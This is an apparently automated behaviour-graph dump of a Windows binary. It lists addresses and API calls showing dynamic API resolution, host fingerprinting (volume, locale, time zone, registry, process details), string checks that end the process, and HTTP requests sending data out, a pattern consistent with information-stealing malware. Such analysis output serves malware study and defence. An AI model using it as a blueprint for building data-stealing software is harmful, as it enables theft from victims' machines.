b03d8e 14455->14456 14457 b045c0 2 API calls 14456->14457 14458 b03da7 14457->14458 14459 b045c0 2 API calls 14458->14459 14460 b03dc0 14459->14460 14461 b045c0 2 API calls 14460->14461 14462 b03dd9 14461->14462 14463 b045c0 2 API calls 14462->14463 14464 b03df2 14463->14464 14465 b045c0 2 API calls 14464->14465 14466 b03e0b 14465->14466 14467 b045c0 2 API calls 14466->14467 14468 b03e24 14467->14468 14469 b045c0 2 API calls 14468->14469 14470 b03e3d 14469->14470 14471 b045c0 2 API calls 14470->14471 14472 b03e56 14471->14472 14473 b045c0 2 API calls 14472->14473 14474 b03e6f 14473->14474 14475 b045c0 2 API calls 14474->14475 14476 b03e88 14475->14476 14477 b045c0 2 API calls 14476->14477 14478 b03ea1 14477->14478 14479 b045c0 2 API calls 14478->14479 14480 b03eba 14479->14480 14481 b045c0 2 API calls 14480->14481 14482 b03ed3 14481->14482 14483 b045c0 2 API calls 14482->14483 14484 b03eec 14483->14484 14485 b045c0 2 API calls 14484->14485 14486 b03f05 14485->14486 14487 b045c0 2 API calls 14486->14487 14488 b03f1e 14487->14488 14489 b045c0 2 API calls 14488->14489 14490 b03f37 14489->14490 14491 b045c0 2 API calls 14490->14491 14492 b03f50 14491->14492 14493 b045c0 2 API calls 14492->14493 14494 b03f69 14493->14494 14495 b045c0 2 API calls 14494->14495 14496 b03f82 14495->14496 14497 b045c0 2 API calls 14496->14497 14498 b03f9b 14497->14498 14499 b045c0 2 API calls 14498->14499 14500 b03fb4 14499->14500 14501 b045c0 2 API calls 14500->14501 14502 b03fcd 14501->14502 14503 b045c0 2 API calls 14502->14503 14504 b03fe6 14503->14504 14505 b045c0 2 API calls 14504->14505 14506 b03fff 14505->14506 14507 b045c0 2 API calls 14506->14507 14508 b04018 14507->14508 14509 b045c0 2 API calls 14508->14509 14510 b04031 14509->14510 14511 b045c0 2 API calls 14510->14511 14512 b0404a 14511->14512 14513 b045c0 2 API calls 14512->14513 14514 b04063 14513->14514 14515 b045c0 2 API calls 14514->14515 14516 b0407c 14515->14516 14517 b045c0 2 API calls 14516->14517 14518 b04095 14517->14518 14519 b045c0 2 API calls 14518->14519 14520 b040ae 14519->14520 14521 b045c0 2 API calls 14520->14521 14522 b040c7 14521->14522 14523 b045c0 2 API calls 14522->14523 14524 b040e0 14523->14524 14525 b045c0 2 API calls 14524->14525 14526 b040f9 14525->14526 14527 b045c0 2 API calls 14526->14527 14528 b04112 14527->14528 14529 b045c0 2 API calls 14528->14529 14530 b0412b 14529->14530 14531 b045c0 2 API calls 14530->14531 14532 b04144 14531->14532 14533 b045c0 2 API calls 14532->14533 14534 b0415d 14533->14534 14535 b045c0 2 API calls 14534->14535 14536 b04176 14535->14536 14537 b045c0 2 API calls 14536->14537 14538 b0418f 14537->14538 14539 b045c0 2 API calls 14538->14539 14540 b041a8 14539->14540 14541 b045c0 2 API calls 14540->14541 14542 b041c1 14541->14542 14543 b045c0 2 API calls 14542->14543 14544 b041da 14543->14544 14545 b045c0 2 API calls 14544->14545 14546 b041f3 14545->14546 14547 b045c0 2 API calls 14546->14547 14548 b0420c 14547->14548 14549 b045c0 2 API calls 14548->14549 14550 b04225 14549->14550 14551 b045c0 2 API calls 14550->14551 14552 b0423e 14551->14552 14553 b045c0 2 API calls 14552->14553 14554 b04257 14553->14554 14555 b045c0 2 API calls 14554->14555 14556 b04270 14555->14556 14557 b045c0 2 API calls 14556->14557 14558 b04289 14557->14558 14559 b045c0 2 API calls 14558->14559 14560 b042a2 14559->14560 14561 b045c0 2 API calls 14560->14561 14562 b042bb 14561->14562 14563 b045c0 2 API calls 14562->14563 14564 b042d4 14563->14564 14565 b045c0 2 API calls 14564->14565 14566 b042ed 14565->14566 14567 b045c0 2 API calls 14566->14567 14568 b04306 14567->14568 14569 b045c0 2 API calls 14568->14569 14570 b0431f 14569->14570 14571 b045c0 2 API calls 14570->14571 14572 b04338 14571->14572 14573 b045c0 2 API calls 14572->14573 14574 b04351 14573->14574 14575 b045c0 2 API calls 14574->14575 14576 b0436a 14575->14576 14577 b045c0 2 API calls 14576->14577 14578 b04383 14577->14578 14579 b045c0 2 API calls 14578->14579 14580 b0439c 14579->14580 14581 b045c0 2 API calls 14580->14581 14582 b043b5 14581->14582 14583 b045c0 2 API calls 14582->14583 14584 b043ce 14583->14584 14585 b045c0 2 API calls 14584->14585 14586 b043e7 14585->14586 14587 b045c0 2 API calls 14586->14587 14588 b04400 14587->14588 14589 b045c0 2 API calls 14588->14589 14590 b04419 14589->14590 14591 b045c0 2 API calls 14590->14591 14592 b04432 14591->14592 14593 b045c0 2 API calls 14592->14593 14594 b0444b 14593->14594 14595 b045c0 2 API calls 14594->14595 14596 b04464 14595->14596 14597 b045c0 2 API calls 14596->14597 14598 b0447d 14597->14598 14599 b045c0 2 API calls 14598->14599 14600 b04496 14599->14600 14601 b045c0 2 API calls 14600->14601 14602 b044af 14601->14602 14603 b045c0 2 API calls 14602->14603 14604 b044c8 14603->14604 14605 b045c0 2 API calls 14604->14605 14606 b044e1 14605->14606 14607 b045c0 2 API calls 14606->14607 14608 b044fa 14607->14608 14609 b045c0 2 API calls 14608->14609 14610 b04513 14609->14610 14611 b045c0 2 API calls 14610->14611 14612 b0452c 14611->14612 14613 b045c0 2 API calls 14612->14613 14614 b04545 14613->14614 14615 b045c0 2 API calls 14614->14615 14616 b0455e 14615->14616 14617 b045c0 2 API calls 14616->14617 14618 b04577 14617->14618 14619 b045c0 2 API calls 14618->14619 14620 b04590 14619->14620 14621 b045c0 2 API calls 14620->14621 14622 b045a9 14621->14622 14623 b19c10 14622->14623 14624 b19c20 43 API calls 14623->14624 14625 b1a036 8 API calls 14623->14625 14624->14625 14626 b1a146 14625->14626 14627 b1a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14625->14627 14628 b1a153 8 API calls 14626->14628 14629 b1a216 14626->14629 14627->14626 14628->14629 14630 b1a298 14629->14630 14631 b1a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14629->14631 14632 b1a2a5 6 API calls 14630->14632 14633 b1a337 14630->14633 14631->14630 14632->14633 14634 b1a344 9 API calls 14633->14634 14635 b1a41f 14633->14635 14634->14635 14636 b1a4a2 14635->14636 14637 b1a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14635->14637 14638 b1a4ab GetProcAddress GetProcAddress 14636->14638 14639 b1a4dc 14636->14639 14637->14636 14638->14639 14640 b1a515 14639->14640 14641 b1a4e5 GetProcAddress GetProcAddress 14639->14641 14642 b1a612 14640->14642 14643 b1a522 10 API calls 14640->14643 14641->14640 14644 b1a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14642->14644 14645 b1a67d 14642->14645 14643->14642 14644->14645 14646 b1a686 GetProcAddress 14645->14646 14647 b1a69e 14645->14647 14646->14647 14648 b1a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14647->14648 14649 b15ca3 14647->14649 14648->14649 14650 b01590 14649->14650 15771 b01670 14650->15771 14653 b1a7a0 lstrcpy 14654 b015b5 14653->14654 14655 b1a7a0 lstrcpy 14654->14655 14656 b015c7 14655->14656 14657 b1a7a0 lstrcpy 14656->14657 14658 b015d9 14657->14658 14659 b1a7a0 lstrcpy 14658->14659 14660 b01663 14659->14660 14661 b15510 14660->14661 14662 b15521 14661->14662 14663 b1a820 2 API calls 14662->14663 14664 b1552e 14663->14664 14665 b1a820 2 API calls 14664->14665 14666 b1553b 14665->14666 14667 b1a820 2 API calls 14666->14667 14668 b15548 14667->14668 14669 b1a740 lstrcpy 14668->14669 14670 b15555 14669->14670 14671 b1a740 lstrcpy 14670->14671 14672 b15562 14671->14672 14673 b1a740 lstrcpy 14672->14673 14674 b1556f 14673->14674 14675 b1a740 lstrcpy 14674->14675 14715 b1557c 14675->14715 14676 b1a740 lstrcpy 14676->14715 14677 b15643 StrCmpCA 14677->14715 14678 b156a0 StrCmpCA 14679 b157dc 14678->14679 14678->14715 14680 b1a8a0 lstrcpy 14679->14680 14681 b157e8 14680->14681 14682 b1a820 2 API calls 14681->14682 14684 b157f6 14682->14684 14683 b1a820 lstrlen lstrcpy 14683->14715 14686 b1a820 2 API calls 14684->14686 14685 b15856 StrCmpCA 14687 b15991 14685->14687 14685->14715 14689 b15805 14686->14689 14688 b1a8a0 lstrcpy 14687->14688 14691 b1599d 14688->14691 14692 b01670 lstrcpy 14689->14692 14690 b01590 lstrcpy 14690->14715 14693 b1a820 2 API calls 14691->14693 14714 b15811 14692->14714 14695 b159ab 14693->14695 14694 b151f0 20 API calls 14694->14715 14697 b1a820 2 API calls 14695->14697 14696 b15a0b StrCmpCA 14698 b15a16 Sleep 14696->14698 14699 b15a28 14696->14699 14701 b159ba 14697->14701 14698->14715 14702 b1a8a0 lstrcpy 14699->14702 14700 b1a8a0 lstrcpy 14700->14715 14703 b01670 lstrcpy 14701->14703 14704 b15a34 14702->14704 14703->14714 14705 b1a820 2 API calls 14704->14705 14706 b15a43 14705->14706 14708 b1a820 2 API calls 14706->14708 14707 b152c0 25 API calls 14707->14715 14709 b15a52 14708->14709 14711 b01670 lstrcpy 14709->14711 14710 b1578a StrCmpCA 14710->14715 14711->14714 14712 b1a7a0 lstrcpy 14712->14715 14713 b1593f StrCmpCA 14713->14715 14714->13768 14715->14676 14715->14677 14715->14678 14715->14683 14715->14685 14715->14690 14715->14694 14715->14696 14715->14700 14715->14707 14715->14710 14715->14712 14715->14713 14717 b17553 GetVolumeInformationA 14716->14717 14718 b1754c 14716->14718 14719 b17591 14717->14719 14718->14717 14720 b175fc GetProcessHeap RtlAllocateHeap 14719->14720 14721 b17619 14720->14721 14722 b17628 wsprintfA 14720->14722 14723 b1a740 lstrcpy 14721->14723 14724 b1a740 lstrcpy 14722->14724 14725 b15da7 14723->14725 14724->14725 14725->13789 14727 b1a7a0 lstrcpy 14726->14727 14728 b04899 14727->14728 15780 b047b0 14728->15780 14730 b048a5 14731 b1a740 lstrcpy 14730->14731 14732 b048d7 14731->14732 14733 b1a740 lstrcpy 14732->14733 14734 b048e4 14733->14734 14735 b1a740 lstrcpy 14734->14735 14736 b048f1 14735->14736 14737 b1a740 lstrcpy 14736->14737 14738 b048fe 14737->14738 14739 b1a740 lstrcpy 14738->14739 14740 b0490b InternetOpenA StrCmpCA 14739->14740 14741 b04944 14740->14741 14742 b04ecb InternetCloseHandle 14741->14742 15786 b18b60 14741->15786 14744 b04ee8 14742->14744 15801 b09ac0 CryptStringToBinaryA 14744->15801 14745 b04963 15794 b1a920 14745->15794 14748 b04976 14750 b1a8a0 lstrcpy 14748->14750 14755 b0497f 14750->14755 14751 b1a820 2 API calls 14752 b04f05 14751->14752 14754 b1a9b0 4 API calls 14752->14754 14753 b04f27 ctype 14758 b1a7a0 lstrcpy 14753->14758 14756 b04f1b 14754->14756 14759 b1a9b0 4 API calls 14755->14759 14757 b1a8a0 lstrcpy 14756->14757 14757->14753 14770 b04f57 14758->14770 14760 b049a9 14759->14760 14761 b1a8a0 lstrcpy 14760->14761 14762 b049b2 14761->14762 14763 b1a9b0 4 API calls 14762->14763 14764 b049d1 14763->14764 14765 b1a8a0 lstrcpy 14764->14765 14766 b049da 14765->14766 14767 b1a920 3 API calls 14766->14767 14768 b049f8 14767->14768 14769 b1a8a0 lstrcpy 14768->14769 14771 b04a01 14769->14771 14770->13792 14772 b1a9b0 4 API calls 14771->14772 14773 b04a20 14772->14773 14774 b1a8a0 lstrcpy 14773->14774 14775 b04a29 14774->14775 14776 b1a9b0 4 API calls 14775->14776 14777 b04a48 14776->14777 14778 b1a8a0 lstrcpy 14777->14778 14779 b04a51 14778->14779 14780 b1a9b0 4 API calls 14779->14780 14781 b04a7d 14780->14781 14782 b1a920 3 API calls 14781->14782 14783 b04a84 14782->14783 14784 b1a8a0 lstrcpy 14783->14784 14785 b04a8d 14784->14785 14786 b04aa3 InternetConnectA 14785->14786 14786->14742 14787 b04ad3 HttpOpenRequestA 14786->14787 14789 b04b28 14787->14789 14790 b04ebe InternetCloseHandle 14787->14790 14791 b1a9b0 4 API calls 14789->14791 14790->14742 14792 b04b3c 14791->14792 14793 b1a8a0 lstrcpy 14792->14793 14794 b04b45 14793->14794 14795 b1a920 3 API calls 14794->14795 14796 b04b63 14795->14796 14797 b1a8a0 lstrcpy 14796->14797 14798 b04b6c 14797->14798 14799 b1a9b0 4 API calls 14798->14799 14800 b04b8b 14799->14800 14801 b1a8a0 lstrcpy 14800->14801 14802 b04b94 14801->14802 14803 b1a9b0 4 API calls 14802->14803 14804 b04bb5 14803->14804 14805 b1a8a0 lstrcpy 14804->14805 14806 b04bbe 14805->14806 14807 b1a9b0 4 API calls 14806->14807 14808 b04bde 14807->14808 14809 b1a8a0 lstrcpy 14808->14809 14810 b04be7 14809->14810 14811 b1a9b0 4 API calls 14810->14811 14812 b04c06 14811->14812 14813 b1a8a0 lstrcpy 14812->14813 14814 b04c0f 14813->14814 14815 b1a920 3 API calls 14814->14815 14816 b04c2d 14815->14816 14817 b1a8a0 lstrcpy 14816->14817 14818 b04c36 14817->14818 14819 b1a9b0 4 API calls 14818->14819 14820 b04c55 14819->14820 14821 b1a8a0 lstrcpy 14820->14821 14822 b04c5e 14821->14822 14823 b1a9b0 4 API calls 14822->14823 14824 b04c7d 14823->14824 14825 b1a8a0 lstrcpy 14824->14825 14826 b04c86 14825->14826 14827 b1a920 3 API calls 14826->14827 14828 b04ca4 14827->14828 14829 b1a8a0 lstrcpy 14828->14829 14830 b04cad 14829->14830 14831 b1a9b0 4 API calls 14830->14831 14832 b04ccc 14831->14832 14833 b1a8a0 lstrcpy 14832->14833 14834 b04cd5 14833->14834 14835 b1a9b0 4 API calls 14834->14835 14836 b04cf6 14835->14836 14837 b1a8a0 lstrcpy 14836->14837 14838 b04cff 14837->14838 14839 b1a9b0 4 API calls 14838->14839 14840 b04d1f 14839->14840 14841 b1a8a0 lstrcpy 14840->14841 14842 b04d28 14841->14842 14843 b1a9b0 4 API calls 14842->14843 14844 b04d47 14843->14844 14845 b1a8a0 lstrcpy 14844->14845 14846 b04d50 14845->14846 14847 b1a920 3 API calls 14846->14847 14848 b04d6e 14847->14848 14849 b1a8a0 lstrcpy 14848->14849 14850 b04d77 14849->14850 14851 b1a740 lstrcpy 14850->14851 14852 b04d92 14851->14852 14853 b1a920 3 API calls 14852->14853 14854 b04db3 14853->14854 14855 b1a920 3 API calls 14854->14855 14856 b04dba 14855->14856 14857 b1a8a0 lstrcpy 14856->14857 14858 b04dc6 14857->14858 14859 b04de7 lstrlen 14858->14859 14860 b04dfa 14859->14860 14861 b04e03 lstrlen 14860->14861 15800 b1aad0 14861->15800 14863 b04e13 HttpSendRequestA 14864 b04e32 InternetReadFile 14863->14864 14865 b04e67 InternetCloseHandle 14864->14865 14870 b04e5e 14864->14870 14867 b1a800 14865->14867 14867->14790 14868 b1a9b0 4 API calls 14868->14870 14869 b1a8a0 lstrcpy 14869->14870 14870->14864 14870->14865 14870->14868 14870->14869 15807 b1aad0 14871->15807 14873 b117c4 StrCmpCA 14874 b117cf ExitProcess 14873->14874 14876 b117d7 14873->14876 14875 b119c2 14875->13794 14876->14875 14877 b118f1 StrCmpCA 14876->14877 14878 b11951 StrCmpCA 14876->14878 14879 b11970 StrCmpCA 14876->14879 14880 b11913 StrCmpCA 14876->14880 14881 b11932 StrCmpCA 14876->14881 14882 b1185d StrCmpCA 14876->14882 14883 b1187f StrCmpCA 14876->14883 14884 b118ad StrCmpCA 14876->14884 14885 b118cf StrCmpCA 14876->14885 14886 b1a820 lstrlen lstrcpy 14876->14886 14877->14876 14878->14876 14879->14876 14880->14876 14881->14876 14882->14876 14883->14876 14884->14876 14885->14876 14886->14876 14888 b1a7a0 lstrcpy 14887->14888 14889 b05979 14888->14889 14890 b047b0 2 API calls 14889->14890 14891 b05985 14890->14891 14892 b1a740 lstrcpy 14891->14892 14893 b059ba 14892->14893 14894 b1a740 lstrcpy 14893->14894 14895 b059c7 14894->14895 14896 b1a740 lstrcpy 14895->14896 14897 b059d4 14896->14897 14898 b1a740 lstrcpy 14897->14898 14899 b059e1 14898->14899 14900 b1a740 lstrcpy 14899->14900 14901 b059ee InternetOpenA StrCmpCA 14900->14901 14902 b05a1d 14901->14902 14903 b05fc3 InternetCloseHandle 14902->14903 14904 b18b60 3 API calls 14902->14904 14905 b05fe0 14903->14905 14906 b05a3c 14904->14906 14908 b09ac0 4 API calls 14905->14908 14907 b1a920 3 API calls 14906->14907 14909 b05a4f 14907->14909 14910 b05fe6 14908->14910 14911 b1a8a0 lstrcpy 14909->14911 14912 b1a820 2 API calls 14910->14912 14914 b0601f ctype 14910->14914 14917 b05a58 14911->14917 14913 b05ffd 14912->14913 14915 b1a9b0 4 API calls 14913->14915 14919 b1a7a0 lstrcpy 14914->14919 14916 b06013 14915->14916 14918 b1a8a0 lstrcpy 14916->14918 14920 b1a9b0 4 API calls 14917->14920 14918->14914 14928 b0604f 14919->14928 14921 b05a82 14920->14921 14922 b1a8a0 lstrcpy 14921->14922 14923 b05a8b 14922->14923 14924 b1a9b0 4 API calls 14923->14924 14925 b05aaa 14924->14925 14926 b1a8a0 lstrcpy 14925->14926 14927 b05ab3 14926->14927 14929 b1a920 3 API calls 14927->14929 14928->13800 14930 b05ad1 14929->14930 14931 b1a8a0 lstrcpy 14930->14931 14932 b05ada 14931->14932 14933 b1a9b0 4 API calls 14932->14933 14934 b05af9 14933->14934 14935 b1a8a0 lstrcpy 14934->14935 14936 b05b02 14935->14936 14937 b1a9b0 4 API calls 14936->14937 14938 b05b21 14937->14938 14939 b1a8a0 lstrcpy 14938->14939 14940 b05b2a 14939->14940 14941 b1a9b0 4 API calls 14940->14941 14942 b05b56 14941->14942 14943 b1a920 3 API calls 14942->14943 14944 b05b5d 14943->14944 14945 b1a8a0 lstrcpy 14944->14945 14946 b05b66 14945->14946 14947 b05b7c InternetConnectA 14946->14947 14947->14903 14948 b05bac HttpOpenRequestA 14947->14948 14950 b05fb6 InternetCloseHandle 14948->14950 14951 b05c0b 14948->14951 14950->14903 14952 b1a9b0 4 API calls 14951->14952 14953 b05c1f 14952->14953 14954 b1a8a0 lstrcpy 14953->14954 14955 b05c28 14954->14955 14956 b1a920 3 API calls 14955->14956 14957 b05c46 14956->14957 14958 b1a8a0 lstrcpy 14957->14958 14959 b05c4f 14958->14959 14960 b1a9b0 4 API calls 14959->14960 14961 b05c6e 14960->14961 14962 b1a8a0 lstrcpy 14961->14962 14963 b05c77 14962->14963 14964 b1a9b0 4 API calls 14963->14964 14965 b05c98 14964->14965 14966 b1a8a0 lstrcpy 14965->14966 14967 b05ca1 14966->14967 14968 b1a9b0 4 API calls 14967->14968 14969 b05cc1 14968->14969 14970 b1a8a0 lstrcpy 14969->14970 14971 b05cca 14970->14971 14972 b1a9b0 4 API calls 14971->14972 14973 b05ce9 14972->14973 14974 b1a8a0 lstrcpy 14973->14974 14975 b05cf2 14974->14975 14976 b1a920 3 API calls 14975->14976 14977 b05d10 14976->14977 14978 b1a8a0 lstrcpy 14977->14978 14979 b05d19 14978->14979 14980 b1a9b0 4 API calls 14979->14980 14981 b05d38 14980->14981 14982 b1a8a0 lstrcpy 14981->14982 14983 b05d41 14982->14983 14984 b1a9b0 4 API calls 14983->14984 14985 b05d60 14984->14985 14986 b1a8a0 lstrcpy 14985->14986 14987 b05d69 14986->14987 14988 b1a920 3 API calls 14987->14988 14989 b05d87 14988->14989 14990 b1a8a0 lstrcpy 14989->14990 14991 b05d90 14990->14991 14992 b1a9b0 4 API calls 14991->14992 14993 b05daf 14992->14993 14994 b1a8a0 lstrcpy 14993->14994 14995 b05db8 14994->14995 14996 b1a9b0 4 API calls 14995->14996 14997 b05dd9 14996->14997 14998 b1a8a0 lstrcpy 14997->14998 14999 b05de2 14998->14999 15000 b1a9b0 4 API calls 14999->15000 15001 b05e02 15000->15001 15002 b1a8a0 lstrcpy 15001->15002 15003 b05e0b 15002->15003 15004 b1a9b0 4 API calls 15003->15004 15005 b05e2a 15004->15005 15006 b1a8a0 lstrcpy 15005->15006 15007 b05e33 15006->15007 15008 b1a920 3 API calls 15007->15008 15009 b05e54 15008->15009 15010 b1a8a0 lstrcpy 15009->15010 15011 b05e5d 15010->15011 15012 b05e70 lstrlen 15011->15012 15808 b1aad0 15012->15808 15014 b05e81 lstrlen GetProcessHeap RtlAllocateHeap 15809 b1aad0 15014->15809 15016 b05eae lstrlen 15017 b05ebe 15016->15017 15018 b05ed7 lstrlen 15017->15018 15019 b05ee7 15018->15019 15020 b05ef0 lstrlen 15019->15020 15021 b05f04 15020->15021 15022 b05f1a lstrlen 15021->15022 15810 b1aad0 15022->15810 15024 b05f2a HttpSendRequestA 15025 b05f35 InternetReadFile 15024->15025 15026 b05f6a InternetCloseHandle 15025->15026 15030 b05f61 15025->15030 15026->14950 15028 b1a9b0 4 API calls 15028->15030 15029 b1a8a0 lstrcpy 15029->15030 15030->15025 15030->15026 15030->15028 15030->15029 15032 b11077 15031->15032 15033 b11151 15032->15033 15034 b1a820 lstrlen lstrcpy 15032->15034 15033->13802 15034->15032 15036 b10db7 15035->15036 15037 b10f17 15036->15037 15038 b10ea4 StrCmpCA 15036->15038 15039 b10e27 StrCmpCA 15036->15039 15040 b10e67 StrCmpCA 15036->15040 15041 b1a820 lstrlen lstrcpy 15036->15041 15037->13810 15038->15036 15039->15036 15040->15036 15041->15036 15043 b10f67 15042->15043 15044 b11044 15043->15044 15045 b10fb2 StrCmpCA 15043->15045 15046 b1a820 lstrlen lstrcpy 15043->15046 15044->13818 15045->15043 15046->15043 15048 b1a740 lstrcpy 15047->15048 15049 b11a26 15048->15049 15050 b1a9b0 4 API calls 15049->15050 15051 b11a37 15050->15051 15052 b1a8a0 lstrcpy 15051->15052 15053 b11a40 15052->15053 15054 b1a9b0 4 API calls 15053->15054 15055 b11a5b 15054->15055 15056 b1a8a0 lstrcpy 15055->15056 15057 b11a64 15056->15057 15058 b1a9b0 4 API calls 15057->15058 15059 b11a7d 15058->15059 15060 b1a8a0 lstrcpy 15059->15060 15061 b11a86 15060->15061 15062 b1a9b0 4 API calls 15061->15062 15063 b11aa1 15062->15063 15064 b1a8a0 lstrcpy 15063->15064 15065 b11aaa 15064->15065 15066 b1a9b0 4 API calls 15065->15066 15067 b11ac3 15066->15067 15068 b1a8a0 lstrcpy 15067->15068 15069 b11acc 15068->15069 15070 b1a9b0 4 API calls 15069->15070 15071 b11ae7 15070->15071 15072 b1a8a0 lstrcpy 15071->15072 15073 b11af0 15072->15073 15074 b1a9b0 4 API calls 15073->15074 15075 b11b09 15074->15075 15076 b1a8a0 lstrcpy 15075->15076 15077 b11b12 15076->15077 15078 b1a9b0 4 API calls 15077->15078 15079 b11b2d 15078->15079 15080 b1a8a0 lstrcpy 15079->15080 15081 b11b36 15080->15081 15082 b1a9b0 4 API calls 15081->15082 15083 b11b4f 15082->15083 15084 b1a8a0 lstrcpy 15083->15084 15085 b11b58 15084->15085 15086 b1a9b0 4 API calls 15085->15086 15087 b11b76 15086->15087 15088 b1a8a0 lstrcpy 15087->15088 15089 b11b7f 15088->15089 15090 b17500 6 API calls 15089->15090 15091 b11b96 15090->15091 15092 b1a920 3 API calls 15091->15092 15093 b11ba9 15092->15093 15094 b1a8a0 lstrcpy 15093->15094 15095 b11bb2 15094->15095 15096 b1a9b0 4 API calls 15095->15096 15097 b11bdc 15096->15097 15098 b1a8a0 lstrcpy 15097->15098 15099 b11be5 15098->15099 15100 b1a9b0 4 API calls 15099->15100 15101 b11c05 15100->15101 15102 b1a8a0 lstrcpy 15101->15102 15103 b11c0e 15102->15103 15811 b17690 GetProcessHeap RtlAllocateHeap 15103->15811 15106 b1a9b0 4 API calls 15107 b11c2e 15106->15107 15108 b1a8a0 lstrcpy 15107->15108 15109 b11c37 15108->15109 15110 b1a9b0 4 API calls 15109->15110 15111 b11c56 15110->15111 15112 b1a8a0 lstrcpy 15111->15112 15113 b11c5f 15112->15113 15114 b1a9b0 4 API calls 15113->15114 15115 b11c80 15114->15115 15116 b1a8a0 lstrcpy 15115->15116 15117 b11c89 15116->15117 15818 b177c0 GetCurrentProcess IsWow64Process 15117->15818 15120 b1a9b0 4 API calls 15121 b11ca9 15120->15121 15122 b1a8a0 lstrcpy 15121->15122 15123 b11cb2 15122->15123 15124 b1a9b0 4 API calls 15123->15124 15125 b11cd1 15124->15125 15126 b1a8a0 lstrcpy 15125->15126 15127 b11cda 15126->15127 15128 b1a9b0 4 API calls 15127->15128 15129 b11cfb 15128->15129 15130 b1a8a0 lstrcpy 15129->15130 15131 b11d04 15130->15131 15132 b17850 3 API calls 15131->15132 15133 b11d14 15132->15133 15134 b1a9b0 4 API calls 15133->15134 15135 b11d24 15134->15135 15136 b1a8a0 lstrcpy 15135->15136 15137 b11d2d 15136->15137 15138 b1a9b0 4 API calls 15137->15138 15139 b11d4c 15138->15139 15140 b1a8a0 lstrcpy 15139->15140 15141 b11d55 15140->15141 15142 b1a9b0 4 API calls 15141->15142 15143 b11d75 15142->15143 15144 b1a8a0 lstrcpy 15143->15144 15145 b11d7e 15144->15145 15146 b178e0 3 API calls 15145->15146 15147 b11d8e 15146->15147 15148 b1a9b0 4 API calls 15147->15148 15149 b11d9e 15148->15149 15150 b1a8a0 lstrcpy 15149->15150 15151 b11da7 15150->15151 15152 b1a9b0 4 API calls 15151->15152 15153 b11dc6 15152->15153 15154 b1a8a0 lstrcpy 15153->15154 15155 b11dcf 15154->15155 15156 b1a9b0 4 API calls 15155->15156 15157 b11df0 15156->15157 15158 b1a8a0 lstrcpy 15157->15158 15159 b11df9 15158->15159 15820 b17980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15159->15820 15162 b1a9b0 4 API calls 15163 b11e19 15162->15163 15164 b1a8a0 lstrcpy 15163->15164 15165 b11e22 15164->15165 15166 b1a9b0 4 API calls 15165->15166 15167 b11e41 15166->15167 15168 b1a8a0 lstrcpy 15167->15168 15169 b11e4a 15168->15169 15170 b1a9b0 4 API calls 15169->15170 15171 b11e6b 15170->15171 15172 b1a8a0 lstrcpy 15171->15172 15173 b11e74 15172->15173 15822 b17a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15173->15822 15176 b1a9b0 4 API calls 15177 b11e94 15176->15177 15178 b1a8a0 lstrcpy 15177->15178 15179 b11e9d 15178->15179 15180 b1a9b0 4 API calls 15179->15180 15181 b11ebc 15180->15181 15182 b1a8a0 lstrcpy 15181->15182 15183 b11ec5 15182->15183 15184 b1a9b0 4 API calls 15183->15184 15185 b11ee5 15184->15185 15186 b1a8a0 lstrcpy 15185->15186 15187 b11eee 15186->15187 15825 b17b00 GetUserDefaultLocaleName 15187->15825 15190 b1a9b0 4 API calls 15191 b11f0e 15190->15191 15192 b1a8a0 lstrcpy 15191->15192 15193 b11f17 15192->15193 15194 b1a9b0 4 API calls 15193->15194 15195 b11f36 15194->15195 15196 b1a8a0 lstrcpy 15195->15196 15197 b11f3f 15196->15197 15198 b1a9b0 4 API calls 15197->15198 15199 b11f60 15198->15199 15200 b1a8a0 lstrcpy 15199->15200 15201 b11f69 15200->15201 15829 b17b90 15201->15829 15203 b11f80 15204 b1a920 3 API calls 15203->15204 15205 b11f93 15204->15205 15206 b1a8a0 lstrcpy 15205->15206 15207 b11f9c 15206->15207 15208 b1a9b0 4 API calls 15207->15208 15209 b11fc6 15208->15209 15210 b1a8a0 lstrcpy 15209->15210 15211 b11fcf 15210->15211 15212 b1a9b0 4 API calls 15211->15212 15213 b11fef 15212->15213 15214 b1a8a0 lstrcpy 15213->15214 15215 b11ff8 15214->15215 15841 b17d80 GetSystemPowerStatus 15215->15841 15218 b1a9b0 4 API calls 15219 b12018 15218->15219 15220 b1a8a0 lstrcpy 15219->15220 15221 b12021 15220->15221 15222 b1a9b0 4 API calls 15221->15222 15223 b12040 15222->15223 15224 b1a8a0 lstrcpy 15223->15224 15225 b12049 15224->15225 15226 b1a9b0 4 API calls 15225->15226 15227 b1206a 15226->15227 15228 b1a8a0 lstrcpy 15227->15228 15229 b12073 15228->15229 15230 b1207e GetCurrentProcessId 15229->15230 15843 b19470 OpenProcess 15230->15843 15233 b1a920 3 API calls 15234 b120a4 15233->15234 15235 b1a8a0 lstrcpy 15234->15235 15236 b120ad 15235->15236 15237 b1a9b0 4 API calls 15236->15237 15238 b120d7 15237->15238 15239 b1a8a0 lstrcpy 15238->15239 15240 b120e0 15239->15240 15241 b1a9b0 4 API calls 15240->15241 15242 b12100 15241->15242 15243 b1a8a0 lstrcpy 15242->15243 15244 b12109 15243->15244 15848 b17e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15244->15848 15247 b1a9b0 4 API calls 15248 b12129 15247->15248 15249 b1a8a0 lstrcpy 15248->15249 15250 b12132 15249->15250 15251 b1a9b0 4 API calls 15250->15251 15252 b12151 15251->15252 15253 b1a8a0 lstrcpy 15252->15253 15254 b1215a 15253->15254 15255 b1a9b0 4 API calls 15254->15255 15256 b1217b 15255->15256 15257 b1a8a0 lstrcpy 15256->15257 15258 b12184 15257->15258 15852 b17f60 15258->15852 15261 b1a9b0 4 API calls 15262 b121a4 15261->15262 15263 b1a8a0 lstrcpy 15262->15263 15264 b121ad 15263->15264 15265 b1a9b0 4 API calls 15264->15265 15266 b121cc 15265->15266 15267 b1a8a0 lstrcpy 15266->15267 15268 b121d5 15267->15268 15269 b1a9b0 4 API calls 15268->15269 15270 b121f6 15269->15270 15271 b1a8a0 lstrcpy 15270->15271 15272 b121ff 15271->15272 15865 b17ed0 GetSystemInfo wsprintfA 15272->15865 15275 b1a9b0 4 API calls 15276 b1221f 15275->15276 15277 b1a8a0 lstrcpy 15276->15277 